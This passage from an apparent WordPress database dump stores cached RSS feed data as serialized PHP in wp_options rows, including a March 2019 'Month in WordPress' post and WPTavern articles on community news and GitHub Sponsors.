		\n		\n				\n\n		\n				\n								\n										";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:4:{s:0:"";a:6:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:34:"The Month in WordPress: March 2019";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:69:"https://wordpress.org/news/2019/04/the-month-in-wordpress-march-2019/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Mon, 01 Apr 2019 08:59:01 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:1:{i:0;a:5:{s:4:"data";s:18:"Month in WordPress";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:34:"https://wordpress.org/news/?p=6846";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:368:"WordPress reached a significant milestone this month. With some exciting developments in Core, an interesting new proposal, and the return of a valuable global event, March was certainly an interesting time. WordPress Now Powers One-Third of the Web WordPress’ market share has been steadily increasing, and as of halfway through this month, it powers over [&#8230;]";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:15:"Hugh Lashbrooke";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:7947:"\n<p>WordPress reached a significant milestone this month. With some exciting developments in Core, an interesting new proposal, and the return of a valuable global event, March was certainly an interesting time.</p>\n\n\n\n<hr class="wp-block-separator" />\n\n\n\n<h2>WordPress Now Powers One-Third of the Web</h2>\n\n\n\n<p>WordPress’ market share has been steadily increasing, and as of halfway through this month, it <a href="https://wordpress.org/news/2019/03/one-third-of-the-web/">powers over one-third of the top 10 million sites on the web</a> (<a href="https://w3techs.com/technologies/details/cm-wordpress/all/all">according to W3Techs</a>, which tracks usage statistics for all major web platforms).</p>\n\n\n\n<p>This growth of WordPress is only made possible by the large team of volunteers working to build the project and community. If you would like to get involved in building the future of WordPress, then <a href="https://make.wordpress.org/">check out the Make network</a> for a contributor team that fits your skill set.</p>\n\n\n\n<h2>WordPress 5.2 is on the Way</h2>\n\n\n\n<p><a href="https://wordpress.org/news/2019/03/wordpress-5-1-1-security-and-maintenance-release/">WordPress 5.1.1 was released this month</a>, with 14 fixes and enhancements, and the Core team is now focusing on the next major release, version 5.2. This release will include some great new features, along with <a href="https://make.wordpress.org/core/2019/03/20/whats-new-in-gutenberg-20th-march/">the latest updates to the block editor</a>.</p>\n\n\n\n<p>One of the most anticipated new features is the <a href="https://make.wordpress.org/core/2019/03/20/the-improved-fatal-error-protection/">improved fatal error detection</a> &#8211; this was removed from v5.1 shortly before release so that it could be improved and made more secure for this release. Along with that, <a href="https://wordpress.org/news/2019/04/minimum-php-version-update/">PHP 5.6 is going to become the minimum required PHP version for WordPress</a>, a significant step towards a more modern web and <a href="https://make.wordpress.org/core/2019/03/26/coding-standards-updates-for-php-5-6/">updated coding standards</a>.</p>\n\n\n\n<p><a href="https://wordpress.org/news/2019/03/wordpress-5-2-beta-1/">WordPress 5.2 is now in beta</a> and you can test it by installing <a href="https://wordpress.org/plugins/wordpress-beta-tester/">the Beta Tester plugin</a> on any WordPress site.</p>\n\n\n\n<p>Want to get involved in building WordPress Core? Follow <a href="https://make.wordpress.org/core">the Core team blog</a> and join the #core channel in <a href="https://make.wordpress.org/chat/">the Making WordPress Slack group</a>.</p>\n\n\n\n<h2>Proposal for a Central Block Directory</h2>\n\n\n\n<p>With blocks becoming the new way to manage content in WordPress, more and more types of blocks are being developed to cater for different use cases and content types. In an effort to make it easier for content creators to find these block types, <a href="https://make.wordpress.org/meta/2019/03/08/the-block-directory-and-a-new-type-of-plugin/">there is a proposal</a> for a new type of plugin and a directory to handle it.</p>\n\n\n\n<p>The proposal outlines a new type of WordPress plugin that provides blocks and nothing else, named Single Block Plugins. The primary benefit would be to provide content creators with individual pieces of functionality and new types of blocks without the need to search for and install new plugins.</p>\n\n\n\n<p>The Single Block Plugins would be hosted in a separate Block Directory section of the Plugin Directory and they would initially be JavaScript-based. Each plugin will register a single block, and they will be searchable and installable from within the editor itself. This puts blocks at the publishers’ fingertips &#8212; you no longer have to leave the editor to find them.</p>\n\n\n\n<p>Want to get involved in shaping this new type of plugin? Join in the conversation on <a href="https://make.wordpress.org/meta/2019/03/08/the-block-directory-and-a-new-type-of-plugin/">the proposal post</a>, follow <a href="https://make.wordpress.org/meta/">the Meta team blog</a>, and join the #meta channel in <a href="https://make.wordpress.org/chat/">the Making WordPress Slack group</a>.</p>\n\n\n\n<h2>Global WordPress Translation Day is Back</h2>\n\n\n\n<p>On 11 May 2019, <a href="https://make.wordpress.org/polyglots/2019/03/01/global-wordpress-translation-day-4-is-coming/">the fourth Global WordPress Translation Day</a> will take place. This is a 24-hour global event dedicated to the translation of all things WordPress, from core to themes, plugins to marketing.</p>\n\n\n\n<p>Over the course of 24 hours, WordPress communities will meet to translate WordPress into their local languages and watch talks and sessions broadcast on <a href="https://wptranslationday.org/">wptranslationday.org</a>. During the last Global WordPress Translation Day, 71 local events took place in 29 countries, and even more communities are expected to take part this time.</p>\n\n\n\n<p>Want to get involved in the Global WordPress Translation Day? Find out <a href="https://make.wordpress.org/community/2019/03/22/global-wordpress-translation-day-4-info-for-event-organizers/">how to organize a local event</a>, <a href="https://wptranslationday.org/call-for-speakers/">apply to be a speaker</a>, follow the updates on <a href="https://make.wordpress.org/polyglots/tag/gwtd4/">the Polyglots team blog</a>, and join the #polyglots channel in <a href="https://make.wordpress.org/chat/">the Making WordPress Slack group</a>.</p>\n\n\n\n<h2>Gutenberg Development Continues</h2>\n\n\n\n<p>With the block editor in WordPress Core, the team has been able to focus on adding some frequently requested features. <a href="https://make.wordpress.org/core/2019/03/20/whats-new-in-gutenberg-20th-march/">Version 5.3 of Gutenberg</a>, &nbsp;released this month, includes a new block manager modal, the ability to nest different elements in the cover block, and some UI tweaks to improve the hover state of blocks.</p>\n\n\n\n<p>Want to get involved in developing Gutenberg? Check out <a href="https://github.com/wordpress/gutenberg">the GitHub repository</a> and join the #core-editor channel in <a href="https://make.wordpress.org/chat/">the Making WordPress Slack group</a>.</p>\n\n\n\n<hr class="wp-block-separator" />\n\n\n\n<h2>Further Reading:</h2>\n\n\n\n<ul><li>The PHP upgrade notice in WordPress 5.1 has already had <a href="https://twitter.com/GaryPendergast/status/1108493038811148290">a hugely positive effect</a> on thousands of websites.</li><li>The Theme Review Team has released their useful Theme Sniffer plugin <a href="https://wordpress.org/plugins/theme-sniffer/">on the Plugin Directory</a> to help theme developers build more standards-compliant themes.</li><li>The Polyglots team <a href="https://make.wordpress.org/polyglots/2019/03/27/helphub-localisation-plan-meeting-notes/">has started a discussion</a> about the best way to localize WordPress user documentation.</li><li>The schedule for WordCamp Europe 2019 <a href="https://2019.europe.wordcamp.org/schedule/">has been published</a> &#8211; the event takes place on June 20-22.</li><li>A new `wp_body_open` hook <a href="https://make.wordpress.org/themes/2019/03/29/addition-of-new-wp_body_open-hook/">has been added to Core</a> in version 5.2, providing more power and flexibility for theme developers.</li><li>The dates and location of WordCamp for Publishers 2019 <a href="https://2019-columbus.publishers.wordcamp.org/">have been announced</a>.</li><li>In a milestone achievement for inclusivity, <a href="https://twitter.com/wordcampmiami/status/1109102027324489731">more than 50% of all speakers at WordCamp Miami were women</a>.</li></ul>\n\n\n\n<p><em>Have a story that we should include in the next “Month in WordPress” post? Please </em><a href="https://make.wordpress.org/community/month-in-wordpress-submissions/"><em>submit it here</em></a><em>.</em><br></p>\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:30:"com-wordpress:feed-additions:1";a:1:{s:7:"post-id";a:1:{i:0;a:5:{s:4:"data";s:4:"6846";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}}}s:27:"http://www.w3.org/2005/Atom";a:1:{s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:0:"";s:7:"attribs";a:1:{s:0:"";a:3:{s:4:"href";s:32:"https://wordpress.org/news/feed/";s:3:"rel";s:4:"self";s:4:"type";s:19:"application/rss+xml";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:44:"http://purl.org/rss/1.0/modules/syndication/";a:2:{s:12:"updatePeriod";a:1:{i:0;a:5:{s:4:"data";s:9:"\n	hourly	";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:15:"updateFrequency";a:1:{i:0;a:5:{s:4:"data";s:4:"\n	1	";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:30:"com-wordpress:feed-additions:1";a:1:{s:4:"site";a:1:{i:0;a:5:{s:4:"data";s:8:"14607090";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}}}}}}}}s:4:"type";i:128;s:7:"headers";O:42:"Requests_Utility_CaseInsensitiveDictionary":1:{s:7:"\0*\0data";a:9:{s:6:"server";s:5:"nginx";s:4:"date";s:29:"Mon, 27 May 2019 01:36:47 GMT";s:12:"content-type";s:34:"application/rss+xml; charset=UTF-8";s:25:"strict-transport-security";s:11:"max-age=360";s:6:"x-olaf";s:3:"⛄";s:13:"last-modified";s:29:"Tue, 21 May 2019 19:13:08 GMT";s:4:"link";s:63:"<https://wordpress.org/news/wp-json/>; rel="https://api.w.org/"";s:15:"x-frame-options";s:10:"SAMEORIGIN";s:4:"x-nc";s:9:"HIT ord 2";}}s:5:"build";s:14:"20190526014313";}', 'no');
INSERT INTO `wp_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES
(765, '_transient_timeout_feed_mod_9bbd59226dc36b9b26cd43f15694c5c3', '1558961195', 'no'),
(766, '_transient_feed_mod_9bbd59226dc36b9b26cd43f15694c5c3', '1558917995', 'no'),
(767, '_transient_timeout_feed_d117b5738fbd35bd8c0391cda1f2b5d9', '1558961198', 'no');
INSERT INTO `wp_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES
(768, '_transient_feed_d117b5738fbd35bd8c0391cda1f2b5d9', 'a:4:{s:5:"child";a:1:{s:0:"";a:1:{s:3:"rss";a:1:{i:0;a:6:{s:4:"data";s:3:"\n\n\n";s:7:"attribs";a:1:{s:0:"";a:1:{s:7:"version";s:3:"2.0";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:1:{s:0:"";a:1:{s:7:"channel";a:1:{i:0;a:6:{s:4:"data";s:61:"\n	\n	\n	\n	\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:1:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:16:"WordPress Planet";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:28:"http://planet.wordpress.org/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"language";a:1:{i:0;a:5:{s:4:"data";s:2:"en";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:47:"WordPress Planet - http://planet.wordpress.org/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"item";a:50:{i:0;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:44:"WPTavern: In Case You Missed It – Issue 24";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:59:"https://wptavern.com/?p=90172&preview=true&preview_id=90172";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:51:"https://wptavern.com/in-case-you-missed-it-issue-24";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:7118:"<a href="https://i0.wp.com/wptavern.com/wp-content/uploads/2016/01/ICYMIFeaturedImage.png?ssl=1" rel="attachment wp-att-50955"><img /></a>photo credit: <a href="http://www.flickr.com/photos/112901923@N07/16153818039">Night Moves</a> &#8211; <a href="https://creativecommons.org/licenses/by-nc/2.0/">(license)</a>\n<p>There’s a lot of great WordPress content published in the community but not all of it is featured on the Tavern. This post is an assortment of items related to WordPress that caught my eye but didn’t make it into a full post.</p>\n<h2>Marcel Bootsman Is on His Way to WordCamp EU</h2>\n<p>Earlier this week, Marcel Bootsman began walking his way to Berlin, Germany, the host city for WordCamp EU. The journey is more than 700 kilometers and Bootsman <a href="https://walktowc.eu/route/#schedule">estimates</a> it will take him about 30 days to reach his destination. Along the way, Bootsman has been publishing blog posts to keep readers informed of his progress.</p>\n<blockquote class="twitter-tweet">\n<p lang="en" dir="ltr">Made it!<a href="https://twitter.com/hashtag/WalkToWCEU?src=hash&ref_src=twsrc%5Etfw">#WalkToWCEU</a> <a href="https://t.co/sQ1XUv8Hje">pic.twitter.com/sQ1XUv8Hje</a></p>\n<p>&mdash; <img src="https://s.w.org/images/core/emoji/12.0.0-1/72x72/1f6b6-1f3fc.png" alt="🚶🏼" class="wp-smiley" /> Marcel Bootsman (@mbootsman) <a href="https://twitter.com/mbootsman/status/1131948855250083840?ref_src=twsrc%5Etfw">May 24, 2019</a></p></blockquote>\n<p></p>\n<p>So far, he&#8217;s published a post a day with stories that include a run-in with a bull in an open field, angry cyclists, and amazing photos of the scenery. You can follow along via the <a href="https://walktowc.eu/">WalkToWordCamp.EU website</a>. <a href="https://walktowc.eu/donate/">Donations</a> raised from the event will go to <a href="https://donatewc.org/">DonateWC</a>.</p>\n<h2>WPSiteSync v1.5.2 Released</h2>\n<p>The folks over at ServerPress <a href="https://wpsitesync.com/announcing-the-release-of-wpsitesync-v1-5-2/">have released</a> a new version of WPSiteSync. This plugin enables users to migrate specific content from one site to another without the need to update target URLs for media files. This version fixes a couple of UI related bugs and interactions with Gutenberg.</p>\n<h2>CannaBiz 2.4 Released</h2>\n<p>Robert DeVore <a href="https://www.wpdispensary.com/cannabiz-v2-4-release-notes/">has released</a> CannaBiz 2.4, a WordPress theme that&#8217;s specifically tailored for the Cannabis industry. This release includes two new action hooks, a Yelp social media link, CSS style updates, new customizer controls for button colors, and third-party plugin style updates.</p>\n<h2>Alternative Gutenberg Block Styles Library</h2>\n<p>Carolina Nymark has created a <a href="http://wpblockstyles.com/">website</a> and <a href="https://github.com/carolinan/wp-block-styles">GitHub </a>repository dedicated to creating and sharing alternative styles for Gutenberg blocks. The website contains tutorials on how to create new block styles, add them to child themes, and how to contribute to the library.</p>\n<h2>Patches That Get Lost in the Void</h2>\n<p>Daniel Jalkut describes what he experienced when trying to contribute a patch to WordPress to fix an issue he and his clients were having. Unfortunately, it wasn&#8217;t a good one.</p>\n<blockquote><p>When somebody comes to your project with a well-thought-out, unit-tested fix, and is met by radio silence? The chances are high that they will never come back again. I have submitted WordPress patches in the past, but after this experience I don’t know if I will bother submitting them again. That’s a big change in my perspective on how the WordPress team works, and on how it should work.</p></blockquote>\n<p>Jalkut isn&#8217;t the first nor will he be the last to have an experience like this. WordPress is a large project that encompasses many areas and if a particular ticket is not in line with higher priorities, the chances of it slipping through the cracks are pretty high.</p>\n<h2>Human Made Launches A New Product but Some People Have No Idea What It Is</h2>\n<p>Human Made has <a href="https://humanmade.com/2019/05/21/beyond-wordpress-10-year-evolution-human-made/">launched a new product</a> called <a href="http://altis-dxp.com/">Altis</a> which is a DXP or Digital Experience Platform for WordPress. After reading the press release and the associated blog post, I found it difficult to understand what the product is and who it&#8217;s for and I&#8217;m not the only one.</p>\n<blockquote class="twitter-tweet">\n<p lang="en" dir="ltr">Maybe human made but not intended for humans. WTF did I just read? <a href="https://t.co/iM2sHKhLwu">https://t.co/iM2sHKhLwu</a></p>\n<p>&mdash; Russell Heimlich (@kingkool68) <a href="https://twitter.com/kingkool68/status/1130921321301463041?ref_src=twsrc%5Etfw">May 21, 2019</a></p></blockquote>\n<p></p>\n<p>Noel Tock, Chief Growth Officer, and Partner at Human Made <a href="https://twitter.com/noeltock/status/1131248394276626432">chimed in</a> and admits that the language used to describe the product is geared towards the enterprise market. He explains that Altis is <span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0" dir="auto">an evolution beyond WordPress that supports personalization, artificial intelligence, experimentation, and faster developer experience. </span></p>\n<p><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0" dir="auto">In a nutshell, Altis is a highly specialized version of WordPress with a UI and features that are geared towards specific clients. If you think you can explain what Altis is in a simpler way, please give it a shot in the comments. </span></p>\n<h2>Tips for Speaking at Your First WordCamp</h2>\n<p>Justin Foell of WebDevStudios explains <a href="https://webdevstudios.com/2019/05/16/speaking-at-your-first-wordcamp/">what you need to know</a> if you&#8217;re speaking at your first WordCamp. If you&#8217;re looking for tips on applying to speak at WordCamps, <a href="https://wptavern.com/tips-for-replying-to-a-call-for-papers-or-a-call-for-speakers">Jennifer Bourn has you covered</a>.</p>\n<blockquote class="wp-embedded-content"><p><a href="https://webdevstudios.com/2019/05/16/speaking-at-your-first-wordcamp/">Speaking at Your First WordCamp? Here&#8217;s What You Need to Know!</a></p></blockquote>\n<p></p>\n<h2>After the Deadline Alternatives</h2>\n<p>In light of After the Deadline being removed from Jetpack, users have been searching for alternatives. <a href="https://wordpress.com/go/content-blogging/the-grammarly-wordpress-tool-and-other-proofreading-solutions/">This post</a> on WordPress.com highlights a few of them.</p>\n<h2>WPCampus Diversity, Equity, and Inclusion statement</h2>\n<blockquote class="wp-embedded-content"><p><a href="https://wpcampus.org/diversity/">Diversity, Equity, and Inclusion</a></p></blockquote>\n<p></p>\n<p>That&#8217;s it for issue twenty-four. If you recently discovered a helpful resource or post related to WordPress, please share it with us in the comments.</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Sat, 25 May 2019 02:19:44 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Jeff Chandler";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:1;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:76:"WPTavern: New GitHub Sponsors Tool Draws Concerns from Open Source Community";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=90081";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:87:"https://wptavern.com/new-github-sponsors-tool-draws-concerns-from-open-source-community";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:9474:"<p>GitHub has <a href="https://github.blog/2019-05-23-announcing-github-sponsors-a-new-way-to-contribute-to-open-source/" rel="noopener noreferrer" target="_blank">launched a new Sponsors tool</a> that allows open source developer to receive financial support. The program is rolling out slowly and currently has a <a href="https://github.com/sponsors/" rel="noopener noreferrer" target="_blank">waitlist</a> for open source contributors or maintainers who want to join. </p>\n<p><a href="https://i1.wp.com/wptavern.com/wp-content/uploads/2019/05/funding-links.png?ssl=1"><img /></a></p>\n<p>For the first year developers are in the program, GitHub will cover all the payment processing fees and has pledged to match all contributions up to $5,000.</p>\n<p>Individual developers participating in the program can customize the funding options displayed when potential supporters click on the Sponsor button. They can add links to other popular funding services, such as Open Collective, Community Bridge, Tidelift, Ko-fi, and Patreon. Open source projects an also specify funding models for contributors by adding a .github/FUNDING.yml file to the project’s master branch.</p>\n<blockquote class="twitter-tweet">\n<p lang="en" dir="ltr">Just enabled <a href="https://twitter.com/github?ref_src=twsrc%5Etfw">@github</a>''s awesome new Sponsor button for <a href="https://twitter.com/parceljs?ref_src=twsrc%5Etfw">@parceljs</a> with a link to our <a href="https://twitter.com/opencollect?ref_src=twsrc%5Etfw">@opencollect</a>! <img src="https://s.w.org/images/core/emoji/12.0.0-1/72x72/1f60d.png" alt="😍" class="wp-smiley" /> <a href="https://t.co/DJnPAtahne">pic.twitter.com/DJnPAtahne</a></p>\n<p>&mdash; Devon Govett (@devongovett) <a href="https://twitter.com/devongovett/status/1131610747266486274?ref_src=twsrc%5Etfw">May 23, 2019</a></p></blockquote>\n<p></p>\n<p>GitHub has an advantage over other competing funding services by having its Sponsorship model embbeded in the GitHub workflow where much of the work actually takes place. However, this also raises concerns about how sponsor expectations may influence a project&#8217;s development.</p>\n<p>&#8220;You can now sponsor developers as a seamless part of your familiar workflow,&#8221; GitHub open source project manager Devon Zuegel said in the announcement. &#8220;When a contributor answers your question, triages your issue, or merges your code, you can head to their profile—or simply hover over their username—to sponsor their work.&#8221;</p>\n<p><a href="https://i1.wp.com/wptavern.com/wp-content/uploads/2019/05/native-workflow-white.png?ssl=1"><img /></a></p>\n<p>Sponsorship is a somewhat subjective term and GitHub isn&#8217;t defining what it means here in the context of marrying it to a contributor&#8217;s workflow. For some, it may mean a no-strings-attached donation. For others, the idea of sponsorship always comes the expectation of a return on an investment. </p>\n<p>Ruby on Rails creator and Basecamp founder David Heinemeier Hansson was one of the most prominent to <a href="https://twitter.com/dhh/status/1131585498395242496" rel="noopener noreferrer" target="_blank">raise concerns about GitHub&#8217;s Sponsors program on Twitter</a>. He sees it as &#8220;a grave risk to open source.&#8221; </p>\n<p>“&#8217;Why haven’t you fixed my issue yet!? I sent you $10! I demand you honor your obligations here. I paid you,&#8217; welcome to small-donation open source 2019,&#8221; Hansson said.</p>\n<p>&#8220;I’m sure GitHub had all the right intentions here. And I’m sure this will work out well for a select few developers who will amass enough donations to ignore individual claims to their time. But I think it’s a grave risk to the culture of open source.&#8221;</p>\n<p>Hansson referenced a recent keynote he delivered at RailsConf 2019 titled &#8220;<a href="https://m.signalvnoise.com/open-source-beyond-the-market/" rel="noopener noreferrer" target="_blank">Open source beyond the market</a>,&#8221; challenging those whose initial reactions are simply that &#8220;donations are a good thing.&#8221; Bringing the concept of sponsorship a into the workflow introduces a transactional nature to the work, with unavoidable marketplace expectations that can complicate a project&#8217;s development.</p>\n<p>&#8220;The marketplace norms are hard to escape,&#8221; Hansson said in his keynote. &#8220;They seep into our unconsciousness. There are plenty of open source users who think themselves less as a recipient of a gift and more like customers with warranty claims, that they’ve done the makers of said open source software a great honor by merely choosing to use their thing.</p>\n<p>&#8220;In fact, it’s kind of a natural extension of a society that worships consumerism above little less. A natural extension of &#8216;the customer is always right,&#8217; of the adversarial relationship between buyer and seller.&#8221;</p>\n<p>Others have expressed more specific concerns, such as Microsoft&#8217;s GitHub becoming the dominant payment platform for open source developers, sponsors receiving priority consideration in issues and PRs over user and project needs, and developers deliberately introducing bugs in order to solicit donations. </p>\n<blockquote class="twitter-tweet">\n<p lang="en" dir="ltr">Already seeing “I will prioritise your issues” in the ‘rewards’ sections on the first sponsor-enabled accounts&#8230; so.. you called it</p>\n<p>&mdash; Lasse Rafn (@LasseRafn) <a href="https://twitter.com/LasseRafn/status/1131601620582764555?ref_src=twsrc%5Etfw">May 23, 2019</a></p></blockquote>\n<p></p>\n<p>Pia Mancini, co-founder of Open Collective, <a href="https://medium.com/open-collective/on-github-sponsors-5450b63caf7d" rel="noopener noreferrer" target="_blank">wrote a response</a> to the concerns that people were sending her way on Twitter. </p>\n<p>&#8220;I am really happy to see such an important player in the ecosystem helping out with the problem of sustaining open source,&#8221; Mancini said. &#8220;Sustaining our commons is an effort that requires everyone to contribute. I am glad to see Github come on board.&#8221; </p>\n<p>This idea of the sustainability of open source and the &#8220;<a href="https://en.wikipedia.org/wiki/Tragedy_of_the_commons" rel="noopener noreferrer" target="_blank">tragedy of the commons</a>&#8221; is one that <a href="https://m.signalvnoise.com/open-source-beyond-the-market/" rel="noopener noreferrer" target="_blank">Hansson and many others reject</a>, but it is one that is commonly embraced by copyleft advocates. It works for Open Collective&#8217;s business model, but comes with its own flavor of reciprocity. Open Collective is distinct in that its funding service is removed from the direct workflow of software development, instead of deeply integrated like GitHub&#8217;s Sponsors tool. </p>\n<p>Mancini said that her company can &#8220;happily coexist with GitHub Sponsors&#8221; because of Open Collective&#8217;s chief differentiators. It was built for projects, not individuals. It offers full transparency about where funds come from and how they are spent. The company also manages the paperwork and tax forms required for fiscal sponsorship. </p>\n<p>&#8220;Open Collective is for funding projects as opposed to individual maintainers,&#8221; Mancini said. &#8220;We strongly believe in supporting communities as a whole, as well as the individuals that make up that community. This helps with ensuring more diversity, and less concentration of power and decisions on one maintainer.&#8221;</p>\n<p>She also cautioned against GitHub trying to swallow up too many aspects of the open source community and injecting its own corporate interests. She hints at a line that the company has not yet crossed but many are still wary of what Microsoft plans to do with GitHub.  </p>\n<p>&#8220;Of course, there’s risk: centralization and lock-in are very risky for communities,&#8221; Mancini said. &#8220;GitHub is Microsoft, which has its own metrics in mind, and it will be difficult for them to be independent, regardless of the good faith of the folks involved.</p>\n<p>&#8220;Attempting to own all aspects of the open source community is a harmful strategy. So far, I don’t think GitHub is trying to do this. They are in a position to help, and they are open to collaborating with existing players.</p>\n<p>&#8220;Does it compete with Open Collective? To some extent. But our growth has never been primarily driven by individuals giving to individuals, but by companies giving to projects. GitHub Sponsors does not solve the need sponsor companies have for invoices and a legal entity to engage with for their vendor systems and documentation requirements.&#8221;</p>\n<p>GitHub&#8217;s intentions may simply be a recognition of what open source software has matured to become &#8211; a driving force of innovation in all industries and an effort worthy of financial support. Giving developers an easy way to receive some reward for their contributions seems rather innocuous, but the concern is that Microsoft cannot foresee the long term consequences of its sponsorship implementation inside GitHub&#8217;s workflow. Open source project maintainers who <a href="https://wptavern.com/github-responds-to-letter-from-open-source-project-maintainers" rel="noopener noreferrer" target="_blank">pressed GitHub for more consideration of open source workflows</a> may get more than they bargained for.</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Fri, 24 May 2019 18:40:15 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Sarah Gooding";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:2;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	